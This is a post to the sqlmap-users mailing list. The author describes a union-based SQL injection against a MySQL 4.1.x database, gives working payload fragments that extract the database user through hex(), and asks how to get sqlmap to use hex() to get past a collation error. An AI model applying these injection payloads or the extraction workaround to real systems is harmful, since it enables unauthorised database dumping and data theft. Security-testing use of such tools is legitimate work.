Hi, I'm using sqlmap mostly for exploiting a sqli/dumping contents.
In the current case I've got a simple union based sqli in a MySQL 4.1.x DB. ..&x=foo union select 1,1,1,1 -- (works) ..&x=foo union select 1,user(),1,1 -- (doesn't work: Illegal mix of collation) to work around the collation issue I used hex() to manually extracting information: ..&x=foo union select 1,hex(user()),1,1 -- (works) Usually I try to give sqlmap all the information it needs to quickly confirm a manually found sqli. sqlmap .... --technique=U --union-char=1 --union-cols=4 detects the sqli but when trying to actually extract information it runs into the mix of collations problem and suggests to use a the 'hidden' switch --no-cast, which doesn't solve the problem. Is there a way to tell sqlmap to use hex() to work around the collation issue? thanks ------------------------------------------------------------------------------ Try before you buy = See our experts in action! The most comprehensive online learning library for Microsoft developers is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, Metro Style Apps, more. Free future releases when you subscribe now! http://p.sf.net/sfu/learndevnow-dev2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
